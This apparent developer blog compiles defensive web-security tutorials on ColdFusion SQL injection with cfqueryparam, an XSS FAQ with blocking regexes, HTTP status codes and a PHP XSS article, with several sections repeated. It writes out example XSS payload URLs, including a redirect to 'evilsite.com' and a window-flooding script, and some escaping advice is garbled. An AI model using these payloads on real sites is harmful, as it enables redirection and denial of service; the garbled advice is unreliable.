It’s pretty easy to demonstrate the security problems inherent in passing unfiltered data to your database. Say you use Microsoft SQL Server and you built a master-detail interface, something common in nearly every ColdFusion application. On the master page, you might have some code that passes a surrogate primary key to the detail page:
<cfoutput query="qGetItems">
<a href="showitem.cfm?itemid=#qGetItems.ItemID#">
#qGetItems.ItemName#
</a><br>
</cfoutput>
Then, on your detail page, you might have a query like this:
<cfquery name="qGetItemDetail" datasource="...">
SELECT *
FROM Item
WHERE ItemID = #URL.ItemID#
</cfquery>
Carefully examining the code above shows that that the detail page expects the variable, URL.ItemID, to be an integer. This is a reasonable expectation, given the construction of the hyperlink on the master page. However, there’s nothing to stop someone from changing the value of URL.ItemID by simply typing in a different value in the browser address:
At this point, there are many things that the end user might enter:
* A different valid number
* A number that doesn’t match any item.
* A value that is something altogether different.
The "something altogether different," when the end user intends to attack your database, is commonly referred to as a SQL injection attack. What follows is a common SQL injection attack used against SQL Server:
In the above example, the address has a valid URL parameter for the primary key value, itemid. But its value is a big string of gibberish. The contents instruct the database server to create a new local user account. By calling the xp_cmdshell system stored procedure, the end user instructs SQL Server to do all sorts of wacky things to do anything that you could do from a command prompt. This end users does all of these actions using whatever set of permissions the SQL Server service has, typically LocalSystem! Naturally, this is a very dangerous security breach.
To build this SQL injection attack, the end user uses double quotes instead of single quotes to wrap the command line he wants to execute. He encodes spaces encoded using the appropriate URL encoding (%20).
An end user could also send the same text directly to the server without using a browser at all. Using a common telnet client would be sufficient; the end user could change any information beforehand. In short, a user can change any data from a browser. If you plan to use any of user inputted data in your SQL, sanitize it first
Using the cfqueryparam Tag
How can you easily prevent the hack I just described above? Use cfqueryparam tag as follows:
<cfquery name="qGetItemDetail" datasource="...">
SELECT *
FROM Item
WHERE ItemID = <cfqueryparam
cfsqltype="CF_SQL_INTEGER"
value="#URL.ItemID#">
</cfquery>
In the above example, using the cfqueryparam tag ensures that the value sent to the database contains an integer and nothing else. If you enable debug output, the following appears:
The syntax for the cfqueryparam tag is pretty straightforward; there are two required attributes which specify the datatype and the value. The cfsqltype attribute specifies the datatype. Set it to one of the types listed in the documentation, such as CF_SQL_INTEGER or CF_SQL_VARCHAR. Set the value attribute to the passed value you want to test.
You can use the list attribute in the cfqueryparam tag to pass lists to your queries; you can use this attribute to filter variables you want to use with an IN or EXISTS SQL clause.
You can use the maxlength attribute in the cfqueryparam tag to specify the maximum length for character strings passed to your queries. When passing floating point values, use the SCALE attribute in the cfqueryparam tag to specify their precision.
One other neat trick you can do with cfqueryparam is using the null attribute to pass null values to the database. Normally, if you wanted to pass a null within your SQL, you might write code like this:
<cfquery ...>
UPDATE Item
SET ItemName = '#Trim(Form.ItemName)#',
ItemDesc = <cfif Len(Trim(Form.ItemDesc))>
'#Trim(Form.ItemDesc)#'
<cfelse>
null
</cfif>
WHERE ItemID = #Form.ItemID#
</cfquery>
This code would pass a null to the database if the user didn’t enter a value into the form field. Using cfqueryparam, you could rewrite the code as follows:
<cfquery ...>
UPDATE Item
SET ItemName = <cfqueryparam
cfsqltype="CF_SQL_VARCHAR"
value="#Form.ItemName#">,
ItemDesc = <cfqueryparam
cfsqltype="CF_SQL_VARCHAR"
value="#Form.ItemDesc#"
null = "#YesNoFormat(NOT Len(Trim(Form.ItemDesc)))#">
WHERE ItemID = <cfqueryparam
cfsqltype="CF_SQL_INTEGER"
value="#Form.ItemID#">
</cfquery>
Caching with the cfqueryparam Tag
One limitation of cfqueryparam is that you can’t use the cachedwithin or cachedafter attributes of the cfquery tag when using the cfqueryparam tag. Using that combination will cause an error message. However, you can work around this by caching the Query variable within a persistent memory scope (Session, Application or Server), or by using the Query-of-Query functionality in ColdFusion MX.
Performance and the cfqueryparam Tag
As mentioned earlier, the cfqueryparam tag may enhance the performance of your SQL statements. Many common database servers can more quickly build a plan for executing your SQL when you build a prepared statement, and they may also cache that plan for later use.
Monday, March 2, 2009
Thursday, February 26, 2009
CROSS SITE SCRIPTING VALIDATIONS
Introduction
Websites today are more complex than ever, containing a lot of dynamic content making the experience for the user more enjoyable. Dynamic content is achieved through the use of web applications which can deliver different output to a user depending on their settings and needs. Dynamic websites suffer from a threat that static websites don't, called "Cross Site Scripting" (or XSS dubbed by other security professionals). Currently small informational tidbits about Cross Site Scripting holes exist but none really explain them to an average person or administrator. This FAQ was written to provide a better understanding of this emerging threat, and to give guidance on detection and prevention.
"What is Cross Site Scripting?"
Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, instant message, or simply just reading a web board or email message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website. Many popular guestbook and forum programs allow users to submit posts with html and javascript embedded in them. If for example I was logged in as "john" and read a message by "joe" that contained malicious javascript in it, then it may be possible for "joe" to hijack my session just by reading his bulletin board post. Further details on how attacks like this are accomplished via "cookie theft" are explained in detail below.
"What does XSS and CSS mean?"
Often people refer to Cross Site Scripting as CSS. There has been a lot of confusion with Cascading Style Sheets (CSS) and cross site scripting. Some security people refer to Cross Site Scripting as XSS. If you hear someone say "I found a XSS hole", they are talking about Cross Site Scripting for certain.
"What are the threats of Cross Site Scripting?"
Often attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user (Read below for further details) in order to gather data from them. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. New malicious uses are being found every day for XSS attacks. The post below by Brett Moore brings up a good point with regard to "Denial Of Service", and potential "auto-attacking" of hosts if a user simply reads a post on a message board.
"What can I do to protect myself as a vendor?"
This is a simple answer. Never trust user input and always filter metacharacters. This will eliminate the majority of XSS attacks. Converting < and > to < and > is also suggested when it comes to script output. Remember XSS holes can be damaging and costly to your business if abused. Often attackers will disclose these holes to the public, which can erode customer and public confidence in the security and privacy of your organization's site. Filtering < and > alone will not solve all cross site scripting attacks and it is suggested you also attempt to filter out ( and ) by translating them to ( and ), and also # and & by translating them to # (#) and & (&).
"What can I do to protect myself as a user?"
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view. If you visit one website and it links to CNN for example, instead of clicking on it visit CNN's main site and use its search engine to find the content. This will probably eliminate ninety percent of the problem. Sometimes XSS can be executed automatically when you open an email, email attachment, read a guestbook, or bulletin board post. If you plan on opening an email, or reading a post on a public board from a person you don't know BE CAREFUL. One of the best ways to protect yourself is to turn off Javascript in your browser settings. In IE turn your security settings to high. This can prevent cookie theft, and in general is a safer thing to do.
"How common are XSS holes?"
Cross site scripting holes are gaining popularity among hackers as easy holes to find in large websites. Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had one form or another of XSS bugs.
Every month roughly 10-25 XSS holes are found in commercial products and advisories are published explaining the threat.
"Does encryption protect me?"
Websites that use SSL (https) are in no way more protected than websites that are not encrypted. The web applications work the same way as before, except the attack is taking place in an encrypted connection. People often think that because they see the lock on their browser it means everything is secure. This just isn't the case.
"Can XSS holes allow command execution?"
XSS holes can allow Javascript insertion, which may allow for limited execution. If an attacker were to exploit a browser flaw (browser hole) it could then be possible to execute commands on the client's side. If command execution were possible it would only be possible on the client side. In simple terms XSS holes can be used to help exploit other holes that may exist in your browser.
"What if I don't feel like fixing a CSS/XSS Hole?"
By not fixing an XSS hole this could allow possible user account compromise in portions of your site as they get added or updated. Cross Site Scripting has been found in various large sites recently and have been widely publicized. Left unrepaired, someone may discover it and publish a warning about your company. This may damage your company's reputation, depicting it as being lax on security matters. This of course also sends the message to your clients that you aren't dealing with every problem that arises, which turns into a trust issue. If your client doesn't trust you why would they wish to do business with you?
CROSS SITE SCRIPTING VALIDATIONS:
1) Examples of regular expressions that may help block cross site scripting:
- A possible regular expression, which will deny the basic cross site scripting variants might be: ^([^<]
|\<[^a-zA-Z])*[<]?$
2) A generic regular expression, which will deny all of the aforementioned characters might be: ^
([^\<\>\"\'\%\;\)\(\&\+]*)$
Websites today are more complex than ever, containing a lot of dynamic content making the experience for the user more enjoyable. Dynamic content is achieved through the use of web applications which can deliver different output to a user depending on their settings and needs. Dynamic websites suffer from a threat that static websites don't, called "Cross Site Scripting" (or XSS dubbed by other security professionals). Currently small informational tidbits about Cross Site Scripting holes exist but none really explain them to an average person or administrator. This FAQ was written to provide a better understanding of this emerging threat, and to give guidance on detection and prevention.
"What is Cross Site Scripting?"
Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, instant message, or simply just reading a web board or email message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website. Many popular guestbook and forum programs allow users to submit posts with html and javascript embedded in them. If for example I was logged in as "john" and read a message by "joe" that contained malicious javascript in it, then it may be possible for "joe" to hijack my session just by reading his bulletin board post. Further details on how attacks like this are accomplished via "cookie theft" are explained in detail below.
"What does XSS and CSS mean?"
Often people refer to Cross Site Scripting as CSS. There has been a lot of confusion with Cascading Style Sheets (CSS) and cross site scripting. Some security people refer to Cross Site Scripting as XSS. If you hear someone say "I found a XSS hole", they are talking about Cross Site Scripting for certain.
"What are the threats of Cross Site Scripting?"
Often attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user (Read below for further details) in order to gather data from them. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. New malicious uses are being found every day for XSS attacks. The post below by Brett Moore brings up a good point with regard to "Denial Of Service", and potential "auto-attacking" of hosts if a user simply reads a post on a message board.
"What can I do to protect myself as a vendor?"
This is a simple answer. Never trust user input and always filter metacharacters. This will eliminate the majority of XSS attacks. Converting < and > to < and > is also suggested when it comes to script output. Remember XSS holes can be damaging and costly to your business if abused. Often attackers will disclose these holes to the public, which can erode customer and public confidence in the security and privacy of your organization's site. Filtering < and > alone will not solve all cross site scripting attacks and it is suggested you also attempt to filter out ( and ) by translating them to ( and ), and also # and & by translating them to # (#) and & (&).
"What can I do to protect myself as a user?"
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view. If you visit one website and it links to CNN for example, instead of clicking on it visit CNN's main site and use its search engine to find the content. This will probably eliminate ninety percent of the problem. Sometimes XSS can be executed automatically when you open an email, email attachment, read a guestbook, or bulletin board post. If you plan on opening an email, or reading a post on a public board from a person you don't know BE CAREFUL. One of the best ways to protect yourself is to turn off Javascript in your browser settings. In IE turn your security settings to high. This can prevent cookie theft, and in general is a safer thing to do.
"How common are XSS holes?"
Cross site scripting holes are gaining popularity among hackers as easy holes to find in large websites. Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had one form or another of XSS bugs.
Every month roughly 10-25 XSS holes are found in commercial products and advisories are published explaining the threat.
"Does encryption protect me?"
Websites that use SSL (https) are in no way more protected than websites that are not encrypted. The web applications work the same way as before, except the attack is taking place in an encrypted connection. People often think that because they see the lock on their browser it means everything is secure. This just isn't the case.
"Can XSS holes allow command execution?"
XSS holes can allow Javascript insertion, which may allow for limited execution. If an attacker were to exploit a browser flaw (browser hole) it could then be possible to execute commands on the client's side. If command execution were possible it would only be possible on the client side. In simple terms XSS holes can be used to help exploit other holes that may exist in your browser.
"What if I don't feel like fixing a CSS/XSS Hole?"
By not fixing an XSS hole this could allow possible user account compromise in portions of your site as they get added or updated. Cross Site Scripting has been found in various large sites recently and have been widely publicized. Left unrepaired, someone may discover it and publish a warning about your company. This may damage your company's reputation, depicting it as being lax on security matters. This of course also sends the message to your clients that you aren't dealing with every problem that arises, which turns into a trust issue. If your client doesn't trust you why would they wish to do business with you?
CROSS SITE SCRIPTING VALIDATIONS:
1) Examples of regular expressions that may help block cross site scripting:
- A possible regular expression, which will deny the basic cross site scripting variants might be: ^([^<]
|\<[^a-zA-Z])*[<]?$
2) A generic regular expression, which will deny all of the aforementioned characters might be: ^
([^\<\>\"\'\%\;\)\(\&\+]*)$
Error Codes
Here are more standard web error numbers. You can see the headers and output at Apache Status Codes and ErrorDocuments
* 100 Continue
* 101 Switching Protocols
* 102 Processing
* 200 OK
* 201 Created
* 202 Accepted
* 203 Non-Authoritative Information
* 204 No Content
* 205 Reset Content
* 206 Partial Content
* 207 Multi-Status
* 300 Multiple Choices
* 301 Moved Permanently
* 302 Found
* 303 See Other
* 304 Not Modified
* 305 Use Proxy
* 307 Temporary Redirect
* 400 Bad Request
* 401 Authorization Required
* 402 Payment Required
* 403 Forbidden
* 404 Not Found
* 405 Method Not Allowed
* 406 Not Acceptable
* 407 Proxy Authentication Required
* 408 Request Time-out
* 409 Conflict
* 410 Gone
* 411 Length Required
* 412 Precondition Failed
* 413 Request Entity Too Large
* 414 Request-URI Too Large
* 415 Unsupported Media Type
* 416 Requested Range Not Satisfiable
* 417 Expectation Failed
* 422 Unprocessable Entity
* 423 Locked
* 424 Failed Dependency
* 425 No code
* 426 Upgrade Required
* 500 Internal Server Error
* 501 Method Not Implemented
* 502 Bad Gateway
* 503 Service Temporarily Unavailable
* 504 Gateway Time-out
* 505 HTTP Version Not Supported
* 506 Variant Also Negotiates
* 507 Insufficient Storage
* 510 Not Extended
* 100 Continue
* 101 Switching Protocols
* 102 Processing
* 200 OK
* 201 Created
* 202 Accepted
* 203 Non-Authoritative Information
* 204 No Content
* 205 Reset Content
* 206 Partial Content
* 207 Multi-Status
* 300 Multiple Choices
* 301 Moved Permanently
* 302 Found
* 303 See Other
* 304 Not Modified
* 305 Use Proxy
* 307 Temporary Redirect
* 400 Bad Request
* 401 Authorization Required
* 402 Payment Required
* 403 Forbidden
* 404 Not Found
* 405 Method Not Allowed
* 406 Not Acceptable
* 407 Proxy Authentication Required
* 408 Request Time-out
* 409 Conflict
* 410 Gone
* 411 Length Required
* 412 Precondition Failed
* 413 Request Entity Too Large
* 414 Request-URI Too Large
* 415 Unsupported Media Type
* 416 Requested Range Not Satisfiable
* 417 Expectation Failed
* 422 Unprocessable Entity
* 423 Locked
* 424 Failed Dependency
* 425 No code
* 426 Upgrade Required
* 500 Internal Server Error
* 501 Method Not Implemented
* 502 Bad Gateway
* 503 Service Temporarily Unavailable
* 504 Gateway Time-out
* 505 HTTP Version Not Supported
* 506 Variant Also Negotiates
* 507 Insufficient Storage
* 510 Not Extended
cross site scripting
cross site scripting:
A Quick Look at Cross Site Scripting
We may not be able to completely bulletproof our websites, but we can at least try to anticipate possible attacks and secure against them. Here is one you might not have heard of: cross site scripting. With just a bit of JavaScript, a malicious attacker can use it to cause all sorts of problems. To find out more about what it is, and how to prevent your website from becoming a victim, keep reading.
Introduction
The question keeps spinning in our minds, just like a ball bouncing deeply inside the brain: is our website really secure? Surely, that’s a very tough topic to answer. But one thing is true in all cases: there are not any websites “completely” safe from attacks. Given the uncontrolled and anonymous nature of the Internet, the concept of a bulletproof website is merely a pipe dream.
More specifically, Web servers are inherently public machines, being accessible by many people around the world, and clearly exposed to several well-known attack techniques. The value of the information stored on servers varies widely, depending on what kind of sites they are hosting, but it’s always appealing to potential attackers. However, there is a lot that we can do about securing our website.
We are well aware of many attack methods which might end up exposing, modifying, or deleting sensitive data, so our site is well assured against them. Also, we have updated our software accordingly, stopped unnecessary services on the server, closed unused TCP ports, encrypted data, and the like. What else could be vulnerable? Many times, it’s not properly considered or ignored: assumptions made by developers.
Designers and programmers need to make many assumptions. Hopefully, they will document their assumptions and usually be right. Sometimes thought, developers will make poor assumptions. These might include that input data will be valid, will not include unusual characters or will be a fixed length. That brings us almost immediately to the well-known “SQL Injections,” widely documented in several articles on the Web, in conjunction with Cross Site Scripting attacks. Here is where this article comes in.
In the rest of the article, I'll cover what Cross Site Scripting is, how it works and how it can be avoided, increasing our site’s security level and, hopefully, bringing an overall improvement to our security strategy.
A Quick Look at Cross Site Scripting - What is Cross Site Scripting?
To understand what Cross Site Scripting is, let’s see a usual situation, common to many sites. Let’s say we are taking some information passed in on a querystring (the string after the (?) character within a URL), with the purpose of displaying the content of a variable, for example, the visitor’s name:
http://www.yourdomain.com/welcomedir/welcomepage.php?name=John
As we can see in this simple querystring, we are passing the visitor’s name as a parameter in the URL, and then displaying it on our “welcomepage.php” page with the following PHP code:
<?php
echo ‘Welcome to our site ’ . stripslashes($_GET[‘name’]);
?>
The result of this snippet is shown below:
Welcome to our site John
This is pretty simple and straightforward. We’re displaying the content of the “name” variable, by using the $_GET superglobal PHP array, as we have done probably hundreds of times. Everything seems to be fine. Now, what’s wrong with this code? Nothing really. But let’s modify the querystring by replacing our visitor’s name passed in the URL:
http://www.yourdomain.com/welcomedir/
welcomepage.php?name=John
with something like this:
http://www.yourdomain.com/welcomedir/
welcomepage.php?name=
<script language=javascript>alert
(‘Hey, you are going to be hijacked!’);</script>
Do you remember the PHP code included in our “welcome.php” page? Yes, you’re correct. When we modify the querystring, the following code is executed:
<?php
echo ‘Welcome to our site ‘ .
<script language=javascript> alert(‘Hey, you are going
to be hijacked!’);</script>
?>
The output of this code is an alert JavaScript box telling you “Hey, you are going be hijacked!” after the “Welcome to our site” phrase.
Very ugly stuff, right? That’s a simple example of the Cross Site Scripting vulnerability. This means that any pasted JavaScript code into the URL will be executed happily with no complaints at all.
Keep reading. There‘s more yet to be revealed!
A Quick Look at Cross Site Scripting - Going deeper into JavaScript
Following the same concept above described, we might build a new URL for achieving more dangerous and annoying effects. It’s just a matter of including a little bit of JavaScript.
For instance:
http://www.yourdomain.com/welcomedir/welcomepage.php?
name=<script language=javascript>window.location=
”http://www.evilsite.com”;</script>
It’s getting more complex now. As we can appreciate, a JavaScript redirection will take place to “www.evilsite.com”, just by including the above URL in the browser location bar. At first glance, it’s not as bad as it seems. After all, we haven’t seen anything that could significantly harm our website. But, is it really true? Let’s present a new example, which might quickly change your mind.
We’ll demonstrate how easy is to manipulate URLs and inject JavaScript into them, for malicious purposes.
For example:
http://www.yourdomain.com/welcomedir/welcomepage.php?
name=<script language=javascript>setInterval
("window.open('http://www.yourdomain.com/','innerName')",100);
</script>
Now, let’s explain in detail what’s going on here. We have inserted JavaScript code to making a request for the http://www.yourdomain.com index page every 100 milliseconds. The setInterval() method is taking care of the task, but other JavaScript methods, such as setTimeout() with a recursive implementation would do the trick too. The code could either heavily overload the Web server where our site is located or generate a Denial of Service condition by denying access to other visitors requesting the same page (or other pages), and inflict noticeable damage to the server performance. On the other hand, it would be harmful to our website’s reputation, just because other users cannot get access to it. Not very good, huh?
Please note that a similar attack effect might be achieved by manipulating sockets with PHP or any other programming language, but that’s another huge subject, out of the scope of this article. Anyway, keeping your sharp eyes open to unusual levels of traffic is a must. So, don’t ever forget to take a look at your site’s logs files and use software for monitoring traffic and real time statistics.
Unfortunately, there are a huge number of ways to attack websites using Cross Site Scripting, embedding JavaScript code into the URL. From relatively innocent and harmless scripts, to risky and harmful code, we have to try to prevent or avoid them.
If this is not enough, we’ll see another common Cross Site Scripting technique: hiding JavaScript code within links.
A Quick Look at Cross Site Scripting - The hidden link
Adding JavaScript code into querystrings is a quite easy stuff to get done, so the same concept is applied to regular links. This is easily deductible, since all of the previous examples presented have manipulated absolute links directly from the location bar. Thus, relative and absolute links within documents or email messages can be tampered too.
An example is useful to properly understand how this technique works:
<a href=”http://www.yourdomain.com/welcomedir/
welcomepage.php?name=<script language=javascript>window.location=’
http://www.evilsite.com’;</script>”>healthy food</a>
If we take a deeper look at the code above listed, we can see clearly what’s going on. Within the regular link, the JavaScript code is inserted to redirect users to a completely different site. The expression seems to be an apparently innocent link, but it’s in fact hiding something else, the JavaScript embedded in the link.
We might send out this link to someone else, so our unworried recipient would click the link to find out a little more about healthy food, and instead being redirected to a different site location, getting something he or she would never expect to see.
Our site’s reputation could be seriously wounded, as we can fairly imagine, if someone is taking care of sending around our URL with the JavaScript code embedded in the link, to numerous recipients. That would result in the nasty redirecting effect previously described. And recipients wouldn’t be happy about it at all!
Having presented the most commonly used Cross Site Scripting techniques, we need to tackle a proper solution to avoid their ugly effects and prevent ourselves from becoming victims of them.
Let’s see how the problem can be solved.
A Quick Look at Cross Site Scripting - Preventing Cross Site Scripting
First off, we need to follow simple and straight rules, applicable to common scenarios, where user input is always involved.
Always, all the time, and constantly (pick your term), check to ensure what’s coming from POST and GET requests. However obvious, you should never pass by these steps.
If a specific and particular type of data is expected, check to ensure that it’s a really valid type and that its of the expected length. Whatever programming language you’re using will give you the possibility and the power to do that easily.
Whenever possible, use client-side validation for adding extra functionality to user input checking. Please note that JavaScript validation cannot be used on its own for checking data validity, but it may help to discourage some evil-minded visitors from entering malicious data while providing useful assistance to other well-intended users.
Remove conflicting characters from user input. Search for < and > characters and make sure they're quickly removed. Single and double quotes must be escaped properly too. Many professional websites fail when dealing with character escaping. I hope you won’t.
We might go on endlessly, with numerous tips about validating user data, but you can get a lot more from just checking some other useful tutorials and articles. For the sake of this article, we’ll show an example to prevent Cross Site Scripting using PHP.
A Quick Look at Cross Site Scripting - Coding for our safety
Let’s define a simple function to prevent the querysting from being tampered with external code. The function “validateQueryString()” is the following:
<?php
function validateQueryString ( $queryString , $min=1,
$max=32 ) {
if ( !preg_match ( "/^([a-zA-Z0-9]{".$min.",".$max."}=[a-zA-Z0-9]{".$min.",".$max."}&?)
+$/", $queryString ) ) {
return false;
}
return true;
}
?>
Once we have defined this function, we call it this way:
<?php
$queryString = $_SERVER[‘QUERY_STRING’];
if ( !validateQueryString ( $queryString ) ) {
header( ‘Location:errorpage.php’ );
}
else {
echo ‘Welcome to our site!’;
}
?>
Let’s break down the code to see it in detail.
The function performs pattern matching to the querystring passed as a parameter, checking to see if it matches the standard format of a querystring, including GET variable names that only contain the numbers 0-9 and valid letters either in lowercase or uppercase. Any other characters will be considered as invalid. Also, we have specified as a default value that variables can be from 1 to 32 characters long. If matches are not found, the function returns false. Otherwise, it will return true.
Next, we have performed validation on the querystring by calling the function. If it returns false -- that is, the querystring contains invalid characters -- the user will be taken to an error page, or whatever you like to do. If the function returns true, we just display a welcome message.
Of course, most of the time, we really know what variables to expect, so our validation function can be significantly simplified.
Given the previous URL,
http://www.yourdomain.com/welcomedir/
welcomepage.php?name=John
where the “name” variable is expected, we might write the new “validateAlphanum()” function:
<?php
function validateAlphanum( $value , $min = 1 , $max =
32 ) {
if ( !preg_match( "/^[a-zA-Z0-9]{".$min.",".$max."}
$/", $value ) ) {
return false;
}
return true;
}
?>
and finally validate the value like this:
<?php
$name = $_GET[‘name’];
if ( !validateAlphanum ( $name ) ) {
header( ‘Location:errorpage.php’ );
}
else {
echo ‘Welcome to our site!’;
}
?>
The concept is the same as explained above. The only noticeable difference is that we’re taking in the “name” variable as the parameter for the “validateAlphanum()” function and checking if it contains only the allowed characters 0-9, a-z and A-Z. Anything else will be considered an invalid input.
If you’re a strong advocate of object oriented programming, as I am, we might easily include this function as a new method for an object that performs user data validation. Something similar to this:
<?php
$name = $_GET[‘name’];
// get variable value
$dv = &new dataValidator();
// instantiate new data
validator object
if ( !$dv->validateAlphanum( $name ) ) {
// execute validation method
header( ‘Location:errorpage.php’ );
}
else {
echo ‘Welcome to our site!’;
}
?>
Pretty simple, isn’t it?
In order to avoid Cross Site Scripting, several approaches can be taken, whether procedural or object-oriented programming is your personal taste.
In both cases, we’ve developed specific functions to validate querystrings and avoid tampered or unexpected user input data, demonstrating that Cross Site Scripting can be prevented easily with some help coming from our favorite server-side language.
Conclusion
As usually, dealing with user input data is a very sensitive issue, and Cross Site Scripting falls under this category. It is a serious problem that can be avoided with some simple validation techniques, as we have seen through this article.
Building up robust applications that won’t make poor assumptions about visitor’s input is definitely the correct way to prevent Cross Site Scripting attacks and other harmful techniques. Client environments must always be considered as a pretty unsafe and unknown territory. So, for the sake of your website’s sanity and yours, keep your eyes open.
A Quick Look at Cross Site Scripting
We may not be able to completely bulletproof our websites, but we can at least try to anticipate possible attacks and secure against them. Here is one you might not have heard of: cross site scripting. With just a bit of JavaScript, a malicious attacker can use it to cause all sorts of problems. To find out more about what it is, and how to prevent your website from becoming a victim, keep reading.
Introduction
The question keeps spinning in our minds, just like a ball bouncing deeply inside the brain: is our website really secure? Surely, that’s a very tough topic to answer. But one thing is true in all cases: there are not any websites “completely” safe from attacks. Given the uncontrolled and anonymous nature of the Internet, the concept of a bulletproof website is merely a pipe dream.
More specifically, Web servers are inherently public machines, being accessible by many people around the world, and clearly exposed to several well-known attack techniques. The value of the information stored on servers varies widely, depending on what kind of sites they are hosting, but it’s always appealing to potential attackers. However, there is a lot that we can do about securing our website.
We are well aware of many attack methods which might end up exposing, modifying, or deleting sensitive data, so our site is well assured against them. Also, we have updated our software accordingly, stopped unnecessary services on the server, closed unused TCP ports, encrypted data, and the like. What else could be vulnerable? Many times, it’s not properly considered or ignored: assumptions made by developers.
Designers and programmers need to make many assumptions. Hopefully, they will document their assumptions and usually be right. Sometimes thought, developers will make poor assumptions. These might include that input data will be valid, will not include unusual characters or will be a fixed length. That brings us almost immediately to the well-known “SQL Injections,” widely documented in several articles on the Web, in conjunction with Cross Site Scripting attacks. Here is where this article comes in.
In the rest of the article, I'll cover what Cross Site Scripting is, how it works and how it can be avoided, increasing our site’s security level and, hopefully, bringing an overall improvement to our security strategy.
A Quick Look at Cross Site Scripting - What is Cross Site Scripting?
To understand what Cross Site Scripting is, let’s see a usual situation, common to many sites. Let’s say we are taking some information passed in on a querystring (the string after the (?) character within a URL), with the purpose of displaying the content of a variable, for example, the visitor’s name:
http://www.yourdomain.com/welcomedir/welcomepage.php?name=John
As we can see in this simple querystring, we are passing the visitor’s name as a parameter in the URL, and then displaying it on our “welcomepage.php” page with the following PHP code:
<?php
echo ‘Welcome to our site ’ . stripslashes($_GET[‘name’]);
?>
The result of this snippet is shown below:
Welcome to our site John
This is pretty simple and straightforward. We’re displaying the content of the “name” variable, by using the $_GET superglobal PHP array, as we have done probably hundreds of times. Everything seems to be fine. Now, what’s wrong with this code? Nothing really. But let’s modify the querystring by replacing our visitor’s name passed in the URL:
http://www.yourdomain.com/welcomedir/
welcomepage.php?name=John
with something like this:
http://www.yourdomain.com/welcomedir/
welcomepage.php?name=
<script language=javascript>alert
(‘Hey, you are going to be hijacked!’);</script>
Do you remember the PHP code included in our “welcome.php” page? Yes, you’re correct. When we modify the querystring, the following code is executed:
<?php
echo ‘Welcome to our site ‘ .
<script language=javascript> alert(‘Hey, you are going
to be hijacked!’);</script>
?>
The output of this code is an alert JavaScript box telling you “Hey, you are going be hijacked!” after the “Welcome to our site” phrase.
Very ugly stuff, right? That’s a simple example of the Cross Site Scripting vulnerability. This means that any pasted JavaScript code into the URL will be executed happily with no complaints at all.
Keep reading. There‘s more yet to be revealed!
A Quick Look at Cross Site Scripting - Going deeper into JavaScript
Following the same concept above described, we might build a new URL for achieving more dangerous and annoying effects. It’s just a matter of including a little bit of JavaScript.
For instance:
http://www.yourdomain.com/welcomedir/welcomepage.php?
name=<script language=javascript>window.location=
”http://www.evilsite.com”;</script>
It’s getting more complex now. As we can appreciate, a JavaScript redirection will take place to “www.evilsite.com”, just by including the above URL in the browser location bar. At first glance, it’s not as bad as it seems. After all, we haven’t seen anything that could significantly harm our website. But, is it really true? Let’s present a new example, which might quickly change your mind.
We’ll demonstrate how easy is to manipulate URLs and inject JavaScript into them, for malicious purposes.
For example:
http://www.yourdomain.com/welcomedir/welcomepage.php?
name=<script language=javascript>setInterval
("window.open('http://www.yourdomain.com/','innerName')",100);
</script>
Now, let’s explain in detail what’s going on here. We have inserted JavaScript code to making a request for the http://www.yourdomain.com index page every 100 milliseconds. The setInterval() method is taking care of the task, but other JavaScript methods, such as setTimeout() with a recursive implementation would do the trick too. The code could either heavily overload the Web server where our site is located or generate a Denial of Service condition by denying access to other visitors requesting the same page (or other pages), and inflict noticeable damage to the server performance. On the other hand, it would be harmful to our website’s reputation, just because other users cannot get access to it. Not very good, huh?
Please note that a similar attack effect might be achieved by manipulating sockets with PHP or any other programming language, but that’s another huge subject, out of the scope of this article. Anyway, keeping your sharp eyes open to unusual levels of traffic is a must. So, don’t ever forget to take a look at your site’s logs files and use software for monitoring traffic and real time statistics.
Unfortunately, there are a huge number of ways to attack websites using Cross Site Scripting, embedding JavaScript code into the URL. From relatively innocent and harmless scripts, to risky and harmful code, we have to try to prevent or avoid them.
If this is not enough, we’ll see another common Cross Site Scripting technique: hiding JavaScript code within links.
A Quick Look at Cross Site Scripting - The hidden link
Adding JavaScript code into querystrings is a quite easy stuff to get done, so the same concept is applied to regular links. This is easily deductible, since all of the previous examples presented have manipulated absolute links directly from the location bar. Thus, relative and absolute links within documents or email messages can be tampered too.
An example is useful to properly understand how this technique works:
<a href=”http://www.yourdomain.com/welcomedir/
welcomepage.php?name=<script language=javascript>window.location=’
http://www.evilsite.com’;</script>”>healthy food</a>
If we take a deeper look at the code above listed, we can see clearly what’s going on. Within the regular link, the JavaScript code is inserted to redirect users to a completely different site. The expression seems to be an apparently innocent link, but it’s in fact hiding something else, the JavaScript embedded in the link.
We might send out this link to someone else, so our unworried recipient would click the link to find out a little more about healthy food, and instead being redirected to a different site location, getting something he or she would never expect to see.
Our site’s reputation could be seriously wounded, as we can fairly imagine, if someone is taking care of sending around our URL with the JavaScript code embedded in the link, to numerous recipients. That would result in the nasty redirecting effect previously described. And recipients wouldn’t be happy about it at all!
Having presented the most commonly used Cross Site Scripting techniques, we need to tackle a proper solution to avoid their ugly effects and prevent ourselves from becoming victims of them.
Let’s see how the problem can be solved.
A Quick Look at Cross Site Scripting - Preventing Cross Site Scripting
First off, we need to follow simple and straight rules, applicable to common scenarios, where user input is always involved.
